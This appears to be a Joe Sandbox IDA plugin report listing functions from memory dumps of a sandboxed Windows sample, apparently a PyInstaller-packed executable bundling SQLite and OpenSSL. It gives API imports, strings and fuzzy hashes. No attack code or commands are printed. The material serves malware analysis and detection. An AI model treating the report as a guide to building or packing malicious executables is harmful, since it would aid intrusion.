Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: :memory:
API String ID: 1405196051-2920599690
Opcode ID: bf70d77afc01cbf19fbbe77a6fbb5ad5d6fb6116ce59a44bb9ab07591d1fa7c8
Instruction ID: beaa72aba430e20e05eeaac11449921b0d7f6854623447f92460835291bf8a0b
Opcode Fuzzy Hash: bf70d77afc01cbf19fbbe77a6fbb5ad5d6fb6116ce59a44bb9ab07591d1fa7c8
Instruction Fuzzy Hash: E9428461B097C386FB68AB259464B7927A0FF85B84F084175CE6E477E9DF3EE4948300

Function 00007FF644879280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF6448792B3
FindClose.KERNEL32 ref: 00007FF6448792C2

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction ID: 3130ba89440e5f17199f01b0e4791b374f000c21622634472f1aacc44fbfb46c
Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction Fuzzy Hash: 64F04422B1C6418AF760BB64B8DA7667350BB84764F040235DE7D42AD8DF3CD0498A04

Function 00007FFDFAEE11E0 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00007FFDFAEE1205

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 7e95180d38cd00ed8df76aa16efa4cdac9e9adb77db5b2022ed37012a1f49ff9
Instruction ID: afd8f80621615718abb468f3823b17b4901be5edb124c7d09f619f64b40a95a4
Opcode Fuzzy Hash: 7e95180d38cd00ed8df76aa16efa4cdac9e9adb77db5b2022ed37012a1f49ff9
Instruction Fuzzy Hash: EDA1ED60F0BB4785FF689B45A8B4B782290BF56740F5A05B5CD3E567E8DF2EA8D09300

Function 00007FF644871950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF644877F90: _fread_nolock.LIBCMT ref: 00007FF64487803A

_fread_nolock.LIBCMT ref: 00007FF644871A1B

Part of subcall function 00007FF644872910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF644871B6A), ref: 00007FF64487295E

Strings

fread, xrefs: 00007FF644871A32, 00007FF644871B5C
Failed to seek to cookie position!, xrefs: 00007FF6448719EE
MEI, xrefs: 00007FF644871991
calloc, xrefs: 00007FF644871A68
Error on file., xrefs: 00007FF644871B8D
Could not read full TOC!, xrefs: 00007FF644871B55
Could not allocate buffer for TOC!, xrefs: 00007FF644871B1B
malloc, xrefs: 00007FF644871B22
Could not allocate memory for archive structure!, xrefs: 00007FF644871A61
fseek, xrefs: 00007FF6448719F5
Failed to read cookie!, xrefs: 00007FF644871A2B

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: ee3080450604db9b79bcaf6ea9780d01564dfb64de786eed8711188a6f6cabc7
Instruction ID: c8e74e29ab882016d0b012d010cee4df9487ba3c87560a8a27fd1fd941d9d4a7
Opcode Fuzzy Hash: ee3080450604db9b79bcaf6ea9780d01564dfb64de786eed8711188a6f6cabc7
Instruction Fuzzy Hash: D0816F71B0CA868DEB60FB1498D26B96390EF84785F444435DD8DC7B8EDE3DE5858740

Function 00007FF644871470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fread, xrefs: 00007FF6448715E6
Failed to extract %s: failed to open archive file!, xrefs: 00007FF64487149F
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF644871518
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6448715DF
malloc, xrefs: 00007FF64487151F
fseek, xrefs: 00007FF6448714E5
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6448714DE

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 36c27e05a3dc08856ce095ca55667838a030721a896d1c10063586a41b75456c
Instruction ID: f54d446251908911f64f5b2f4d617ffb33ebb7b5daef46f80cba576e1df611c2
Opcode Fuzzy Hash: 36c27e05a3dc08856ce095ca55667838a030721a896d1c10063586a41b75456c
Instruction Fuzzy Hash: 3B416022B1C6428EEB14FB2198925B96390FF84B94F444536ED4D97B9EEF3CE501C704

Function 00007FFDFAF544F0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 334
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF54679

Strings

CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text), xrefs: 00007FFDFAF54594
sqlite_master, xrefs: 00007FFDFAF5453C
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 00007FFDFAF5486F
ase, xrefs: 00007FFDFAF5477D
table, xrefs: 00007FFDFAF5451A
sqlite_temp_master, xrefs: 00007FFDFAF54535

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
API String ID: 1405196051-879093740
Opcode ID: d4fad8ce603d4af39c9e6f619e9efd64ec527290160208fa6c2a8eec203bd489
Instruction ID: 4560f4945ac1dfb30786702901fbb8c474d1f30571f1a870fd867b75002988bb
Opcode Fuzzy Hash: d4fad8ce603d4af39c9e6f619e9efd64ec527290160208fa6c2a8eec203bd489
Instruction Fuzzy Hash: 26E1BF22F0C7828AEB18CB259060ABD27A2FF457A9F054275EE6D1B7D9DF38E451C340

Function 00007FF644871210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6448712EF
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF644871276
1.3.1, xrefs: 00007FF644871249
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6448712BA
malloc, xrefs: 00007FF6448712C1, 00007FF6448712F6
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF64487141E

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 01d38e4bc7406ff039fcd5bb421c60dd86912a0bfc5eaad0c764dc15b84283c8
Instruction ID: de75c900769d35fff3529f518f4e3621aba89e85ccf8640be368e0b3e218b3a5
Opcode Fuzzy Hash: 01d38e4bc7406ff039fcd5bb421c60dd86912a0bfc5eaad0c764dc15b84283c8
Instruction Fuzzy Hash: 8B51A322B0C64289EA60BF15A8A23BA6291FF85B95F444135ED4DC7BDEEF3CE545C700

Function 00007FF6448736B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF644873804), ref: 00007FF6448736E1
GetLastError.KERNEL32(?,00007FF644873804), ref: 00007FF6448736EB

Part of subcall function 00007FF644872C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872C9E
Part of subcall function 00007FF644872C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872D63
Part of subcall function 00007FF644872C50: MessageBoxW.USER32 ref: 00007FF644872D99

Strings

Failed to convert executable path to UTF-8., xrefs: 00007FF644873790
Failed to resolve full path to executable %ls., xrefs: 00007FF644873739
Failed to obtain executable path., xrefs: 00007FF6448736F3
GetModuleFileNameW, xrefs: 00007FF6448736FA
\\?\, xrefs: 00007FF64487375A

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction ID: 79b64d87b335e42266532746fd6705270bcfbca3dbfccebbacd77672012858d3
Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction Fuzzy Hash: 402153A1B1CA4299FA20F724ECA73B66250BF98394F804136DE5DC65DDEF2DE504C701

Function 00007FF64488BA5C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF64488BE89

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
Instruction ID: fc3e10131e72d4b54e171f405471ba1110d25cf7302ebdd2061e1b2bde9458ab
Opcode Fuzzy Hash: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
Instruction Fuzzy Hash: 19C1DF22A0CA869AE660BB1594C22BD7B91FFC1B90F554131FE4E8779ADF7CE845C700

Function 00007FF644876360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF644876407
LoadLibrary, xrefs: 00007FF6448764AE
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF6448763C7
ucrtbase.dll, xrefs: 00007FF6448763DD
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF644876456
Failed to load Python DLL '%ls'., xrefs: 00007FF6448764A7

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
Instruction ID: 021450b99195abb182eb78ddebe253e38f3fe9423bc474d40665ae69ee38e4bb
Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
Instruction Fuzzy Hash: D9418121B1CA86D9EA11FB20E8A61E96351FF94394F900132DE5C8369DEF3CE505C740

Function 00007FFDFF1A7980 Relevance: 9.7, APIs: 1, Strings: 4, Instructions: 927COMMON

Download Yara Rule

Strings

ALL:!COMPLEMENTOFDEFAULT:!eNULL, xrefs: 00007FFDFF1A840E
..\s\ssl\ssl_ciph.c, xrefs: 00007FFDFF1A7A5C, 00007FFDFF1A7A8A, 00007FFDFF1A8041, 00007FFDFF1A8293, 00007FFDFF1A82BC, 00007FFDFF1A82DC, 00007FFDFF1A8459, 00007FFDFF1A8473, 00007FFDFF1A849C, 00007FFDFF1A8554, 00007FFDFF1A85C1
ssl_create_cipher_list, xrefs: 00007FFDFF1A7A7E, 00007FFDFF1A82D0
DEFAULT, xrefs: 00007FFDFF1A83BC

Memory Dump Source

Source File: 00000001.00000002.2198558047.00007FFDFF191000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFF190000, based on PE: true

Associated: 00000001.00000002.2198504238.00007FFDFF190000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF212000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF23C000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF247000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF252000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198911802.00007FFDFF256000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff190000_sB2ClgrGng.jbxd

Similarity

API ID: 00007B6570
String ID: ..\s\ssl\ssl_ciph.c$ALL:!COMPLEMENTOFDEFAULT:!eNULL$DEFAULT$ssl_create_cipher_list
API String ID: 4069847057-3764566645
Opcode ID: 726e23a6b8cb307a27e720d3a7ef10f521669d0daa11103ec27c5745eebce1b2
Instruction ID: 43bf4cc97c408c342f04d6bb4fa5375f0397514fa8ea08562e3df9f669c8cb31
Opcode Fuzzy Hash: 726e23a6b8cb307a27e720d3a7ef10f521669d0daa11103ec27c5745eebce1b2
Instruction Fuzzy Hash: 39826A73B08B4681DB58CF55A460AB963A0FB14B84F688236DE7C8B788DF3DDA45C740

Function 00007FFDFAEDFF80 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 409
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FFDFAEE01BA

Strings

psow, xrefs: 00007FFDFAEE0531
delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFDFAEE0296
winOpen, xrefs: 00007FFDFAEE042D
exclusive, xrefs: 00007FFDFAEE014B

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 823142352-3829269058
Opcode ID: 5eded3118f2e83f16c663ba3d7be67e2848f18afe53fd57a268d64a342be5141
Instruction ID: 4236e7773eec2bff7ec825052b7e9e623871f6b332561828216c839f7cf863b6
Opcode Fuzzy Hash: 5eded3118f2e83f16c663ba3d7be67e2848f18afe53fd57a268d64a342be5141
Instruction Fuzzy Hash: BC02C621B0E64386FB68AB11E8B4F7963A0FF85744F090275DD6E466E9CF3DE8849700

Function 00007FFDFAEDD970 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110fileCOMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEDD9B4
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAEDD9DD
ReadFile.KERNEL32 ref: 00007FFDFAEDDA30

Strings

winRead, xrefs: 00007FFDFAEDDA88
delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFDFAEDDAC9

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148$FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 2943692350-1843600136
Opcode ID: 2d071f0ec14e9f2342e488c5eceac2ac141867fbcd48d604d31c43613abbfcf6
Instruction ID: 5652dae5f970862e58b292e5ba0009794aa333f20b08cbfdfe6ad52409ae373a
Opcode Fuzzy Hash: 2d071f0ec14e9f2342e488c5eceac2ac141867fbcd48d604d31c43613abbfcf6
Instruction Fuzzy Hash: 93411532B0EA0381E324AF15E894DA97765FB45780F494132EA6E477ECDF3EE4469740

Function 00007FF644885628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF644885655
CreateFileW.KERNEL32 ref: 00007FF644885694
CloseHandle.KERNEL32 ref: 00007FF6448856C9

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction ID: 094555275460e41ab38db995bfd1209cf170517ad3ba8f7937622459db9d6069
Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
Instruction Fuzzy Hash: A1417122D1C7818BE754BB6095923697760FB947A4F109335EE9C83ADAEF7CE5E08700

Function 00007FFDFF1914BF Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDFF1EE741

Strings

..\s\ssl\statem\statem.c, xrefs: 00007FFDFF1EE831, 00007FFDFF1EE8FB, 00007FFDFF1EEA11, 00007FFDFF1EEA43
state_machine, xrefs: 00007FFDFF1EE82A, 00007FFDFF1EE8F4, 00007FFDFF1EEA05, 00007FFDFF1EEA37

Memory Dump Source

Source File: 00000001.00000002.2198558047.00007FFDFF191000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFF190000, based on PE: true

Associated: 00000001.00000002.2198504238.00007FFDFF190000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF212000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF23C000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF247000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF252000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198911802.00007FFDFF256000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff190000_sB2ClgrGng.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\statem\statem.c$state_machine
API String ID: 1452528299-1722249466
Opcode ID: 9309f1701a42d567f2b256d78ef444061abe5330f80f315c89d8de48205de333
Instruction ID: 2710006531fa8108a76e28835aed707d1f4ee66020afd97c189d14e8a4287bf8
Opcode Fuzzy Hash: 9309f1701a42d567f2b256d78ef444061abe5330f80f315c89d8de48205de333
Instruction Fuzzy Hash: A5A17A23F0864286F7A09B25D460BBA2395EF40B44F594635DA3D866DECFBDF8818781

Function 00007FF64487CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

